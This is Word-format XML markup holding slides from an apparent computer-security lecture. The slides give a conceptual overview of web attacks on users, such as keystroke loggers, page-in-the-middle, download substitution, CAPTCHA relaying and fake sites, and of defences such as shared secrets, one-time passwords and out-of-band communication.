        <w:ind w:left="834.0555572509766" w:right="889.5263671875" w:hanging="285.33233642578125"/>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Whenever it saw a user going to one of those sites, it  redirected the user‘s keystrokes through the Trojan horse and  recorded customer details that it forwarded to remote  computers (presumably controlled by the code‘s creators).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2291717529297"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3.2434082031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11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89.71038818359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Keystroke Logger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329833984375" w:line="239.90396976470947" w:lineRule="auto"/>
        <w:ind w:left="553.2388305664062" w:right="960.99853515625" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="45.959999084472656"/>
          <w:szCs w:val="45.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4"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardware or software that records all keystrokes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="45.959999084472656"/>
          <w:szCs w:val="45.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4"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">May be a small dongle plugged into a USB port or  can masquerade as a keyboard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63037109375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="553.2388305664062" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="45.959999084472656"/>
          <w:szCs w:val="45.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4"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">May also be installed as malware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962890625" w:line="215.90962886810303" w:lineRule="auto"/>
        <w:ind w:left="835.7799530029297" w:right="630.169677734375" w:hanging="282.54112243652344"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="45.959999084472656"/>
          <w:szCs w:val="45.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4"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In software, the logger is just a program installed  like any malicious code. Such devices can capture  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54.040000915527344"/>
          <w:szCs w:val="54.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwords, login identities, and all other data typed  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the keyboard.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1396484375" w:line="215.91363430023193" w:lineRule="auto"/>
        <w:ind w:left="853.0599212646484" w:right="570.960693359375" w:hanging="299.8210906982422"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="45.959999084472656"/>
          <w:szCs w:val="45.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4"/>
          <w:szCs w:val="54"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although not limited to browser interactions, a  keystroke logger could certainly record all keyboard  input to the browser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2143402099609"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12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7.7143859863281"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Page-in-the-Middle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532958984375" w:line="216.04854583740234" w:lineRule="auto"/>
        <w:ind w:left="853.9767456054688" w:right="1667.7197265625" w:hanging="296.2859344482422"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="54.36000061035156"/>
          <w:szCs w:val="54.3600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63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User is directed to a different page than  believed or intended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16796875" w:line="216.04854583740234" w:lineRule="auto"/>
        <w:ind w:left="557.6908111572266" w:right="1753.426513671875" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="54.36000061035156"/>
          <w:szCs w:val="54.3600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63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when the user clicks ―login‖ to go to the  login page of any site, the attack might  redirect the user to the attacker‘s page,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46826171875" w:line="216.1635446548462" w:lineRule="auto"/>
        <w:ind w:left="857.8143310546875" w:right="1656.37939453125" w:hanging="31.974334716796875"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where the attacker can also capture the  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user‘s credentials.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841552734375" w:line="216.04861736297607" w:lineRule="auto"/>
        <w:ind w:left="825.8343505859375" w:right="1516.77490234375" w:hanging="268.14353942871094"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="54.36000061035156"/>
          <w:szCs w:val="54.3600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63.959999084472656"/>
          <w:szCs w:val="63.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Similar effect to a man-in-the-browser,  where attacker can intercept and modify  user input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4172058105469"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13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364.5717430114746" w:lineRule="auto"/>
        <w:ind w:left="554.1291809082031" w:right="2619.755859375" w:firstLine="43.585205078125"/>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Program Download Substitution </w:t>
      </w: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Attacker creates a page with seemingly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70617866516113" w:lineRule="auto"/>
        <w:ind w:left="554.1291809082031" w:right="1047.271728515625" w:firstLine="300.29754638671875"/>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innocuous and desirable programs for download </w:t>
      </w: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Instead of, or in addition to, the intended  functionality, the user installs malware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9326171875" w:line="263.7773609161377" w:lineRule="auto"/>
        <w:ind w:left="554.1291809082031" w:right="1019.251708984375" w:firstLine="0"/>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This is a very common technique for spyware </w:t>
      </w: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A user agreeing to install a program has no way  to know what that program will actually do.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2930297851562"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4000244140625" w:line="559.101676940918" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="482.7915573120117"/>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User-in-the-Middle </w:t>
      </w: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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4065270" cy="374459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65270" cy="374459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8.18237304687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14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306640625" w:line="207.76920318603516" w:lineRule="auto"/>
        <w:ind w:left="763.292236328125" w:right="532.607421875" w:hanging="299.927978515625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="44.15999984741211"/>
          <w:szCs w:val="44.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1.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using click-bait to trick  users into solving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8221435546875" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAPTCHAs on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673828125" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spammers‘ behalf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6953125" w:line="207.76914596557617" w:lineRule="auto"/>
        <w:ind w:left="735.2337646484375" w:right="390.003662109375" w:hanging="271.8695068359375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="44.15999984741211"/>
          <w:szCs w:val="44.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1.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker in the  middle splices together  two interactions by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1770477294922" w:lineRule="auto"/>
        <w:ind w:left="735.2337646484375" w:right="7.578125" w:firstLine="27.5390625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inserting a small amount  of the account creation  thread into the middle of  the photo access thread.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177001953125" w:line="207.7690315246582" w:lineRule="auto"/>
        <w:ind w:left="735.2337646484375" w:right="412.69287109375" w:hanging="271.8695068359375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="51.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="444.4400405883789" w:right="803.138427734375" w:header="0" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:space="0" w:w="6580"/>
            <w:col w:space="0" w:w="6580"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="44.15999984741211"/>
          <w:szCs w:val="44.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1.959999084472656"/>
          <w:szCs w:val="51.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The user is unaware of  the interaction in the  middle.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6067962646484"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15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8.099594116210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Successful Authentication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5328369140625" w:line="258.9114475250244" w:lineRule="auto"/>
        <w:ind w:left="554.1291809082031" w:right="956.4892578125" w:firstLine="0"/>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The attacks are largely failures of authentication </w:t>
      </w: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Common examples of these mechanisms are  SecurID tokens, Google Authenticator, and text  message codes. Driver signing is an example of  using such techniques to mitigate local malware. </w:t>
      </w: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Can be mitigated with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548583984375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016"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Shared secret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40" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016"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One-time password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40" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016"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Out-of-band communication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0399780273438"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16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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="564.1600036621094"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Shared secret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603759765625" w:line="215.91346263885498" w:lineRule="auto"/>
        <w:ind w:left="1255.5998992919922" w:right="609.581298828125" w:hanging="273.09585571289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basic concept is of a shared secret, something only  the two entities on the end should know.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376953125" w:line="215.9135341644287" w:lineRule="auto"/>
        <w:ind w:left="1265.6798553466797" w:right="609.019775390625" w:hanging="283.1758117675781"/>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human man-in-the-middle attack can be defeated if  one party asks the other a pointed question about a  dinner they had together or details of a recent corporate  event, or some other common topic.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2548828125" w:line="215.91370582580566" w:lineRule="auto"/>
        <w:ind w:left="1280.0799560546875" w:right="1472.298583984375" w:hanging="297.57583618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Similarly, a shared secret for computer systems can  help authenticate.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1263427734375" w:line="215.9135913848877" w:lineRule="auto"/>
        <w:ind w:left="1266.159896850586" w:right="1168.1396484375" w:hanging="283.65585327148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Possible secrets could involve the time or date of last  login, time of last update, or size of a particular  application file.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285400390625" w:line="215.9135913848877" w:lineRule="auto"/>
        <w:ind w:left="1280.0799560546875" w:right="939.580078125" w:hanging="297.57583618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To be effective, a shared secret must be something no  malicious middle agent can know.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128387451172"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17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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="556.9599914550781"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One-time password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5986328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016"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one-time password is good for only one use.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6494140625" w:line="259.09629821777344" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016" w:right="986.8615722656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To use a one-time password scheme, the two end  parties need to have a shared secret list of passwords.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When one password is used, both parties mark the  word off the list and use the next word the next time.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SecurID token, generates a new random number  every 60 seconds.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70703125" w:line="239.9040126800537" w:lineRule="auto"/>
        <w:ind w:left="1252.719955444336" w:right="767.41943359375" w:hanging="270.21591186523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receiving computer has a program that can  compute the random number for any given moment, so  it can compare the value entered against the expected  value.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321075439453"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18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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="556.9599914550781"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Out-of-band communication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5986328125" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="1266.159896850586" w:right="551.34033203125" w:hanging="283.65585327148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Out-of-band communication means transferring one fact  along a communication path separate from that of  another fact.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94115447998" w:lineRule="auto"/>
        <w:ind w:left="1255.5998992919922" w:right="633.740234375" w:hanging="273.0958557128906"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="48.040000915527344"/>
          <w:szCs w:val="48.040000915527344"/>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If a customer calls a bank about having forgotten a PIN,  the bank does not simply provide a new PIN in that  conversation over the phone; the bank mails a separate  letter containing a new PIN to the account-holder‘s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address on file.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99462890625" w:line="255.8976173400879" w:lineRule="auto"/>
        <w:ind w:left="982.5040435791016" w:right="1410.3002929687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In this way, if someone were impersonating the  customer, the PIN would not go to the impersonator.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Some banks confirm large Internet fund transfers by  sending a text message to the user‘s mobile phone.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0447845458984"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19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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="540.4000091552734"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Web Attacks Targeting Users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5986328125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344"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Two classes of situations involving web content.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6494140625" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="823.5999298095703" w:right="794.2993164062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first kind involves false content, most likely because  the content was modified by someone unauthorized; with  these the intent is to mislead the viewer.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65505218506" w:lineRule="auto"/>
        <w:ind w:left="820.7199859619141" w:right="1518.37890625" w:hanging="270.21598815917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second, more dangerous, kind seeks to harm the  viewer.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632812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20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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="587.2000122070312"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Defaced Web Site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5986328125" w:line="239.90389823913574" w:lineRule="auto"/>
        <w:ind w:left="848.0799865722656" w:right="768.138427734375" w:hanging="297.57598876953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website defacement occurs when an attacker replaces or  modifies the content of a legitimate web site.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63.8944625854492" w:lineRule="auto"/>
        <w:ind w:left="550.5039978027344" w:right="881.89941406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objectives of website defacements also vary.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Sometimes the goal is just to prove a point or embarrass  the victim.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65039062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21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07080078125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="590.8000183105469"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Fake Web Site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5986328125" w:line="239.9040412902832" w:lineRule="auto"/>
        <w:ind w:left="833.6799621582031" w:right="719.89990234375" w:hanging="283.175964355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Web sites are easy to fake because the attacker can  obtain copies of the images the real site uses to generate  its web site.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89823913574" w:lineRule="auto"/>
        <w:ind w:left="836.0799407958984" w:right="687.900390625" w:hanging="285.575942993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All the attacker has to do is change the values of links to  redirect the unsuspecting victim to points of the attacker‘s  choosing.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40.0706672668457" w:lineRule="auto"/>
        <w:ind w:left="832.239990234375" w:right="882.70263671875" w:hanging="281.73599243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attacker can get all the images a real site uses; fake  sites can look convincing.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8987426757812"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7.7143859863281"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Fake Website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933837890625" w:line="211.34406566619873"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Pr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6559296" cy="481101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59296" cy="4811014"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
